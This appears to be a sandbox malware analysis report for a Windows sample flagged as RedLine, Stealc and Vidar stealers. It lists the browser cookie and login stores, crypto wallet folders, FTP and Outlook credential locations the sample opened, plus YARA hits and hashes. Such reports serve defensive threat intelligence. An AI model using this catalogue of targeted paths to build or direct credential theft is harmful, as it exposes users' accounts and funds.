Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\yiaxs5ej.default
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Searches for user specific document files

Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe

Directory queried: C:\Users\user\Documents

Yara detected Credential Stealer

Source: Yara match	File source: 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 616, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: buildred.exe PID: 6340, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 26.0.buildred.exe.800000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001A.00000000.2683951657.0000000000802000.00000002.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: buildred.exe PID: 6340, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\buildred[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe, type: DROPPED

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.2420117641.00000000026D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2778366166.00000000027D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000002.2853920976.00000000026FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 616, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ba77748b9b.exe PID: 3144, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ba77748b9b.exe PID: 8448, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 616, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8C0C40 sqlite3_bind_zeroblob,	0_2_6C8C0C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8C0D60 sqlite3_bind_parameter_name,	0_2_6C8C0D60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7E8EA0 sqlite3_clear_bindings,	0_2_6C7E8EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8C0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	0_2_6C8C0B40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7E6410 bind,WSAGetLastError,	0_2_6C7E6410

Windows Analysis Report
file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

ID:	1483138
Product:	CloudBasic
Start time:	17:55:12
Start date:	26.07.2024
Sample:	file.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	8e3c2682f9743107cb2b3a3d15b072f5
SHA1:	660a9b6ad3f5cd1bd37e04015b25a893de4c5f90
SHA256:	6322686d71a40e20eca9b41af872049e06aab4439a2d06e607e9620decfec41d
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
file.exe

Malware Threat Intel
Provided by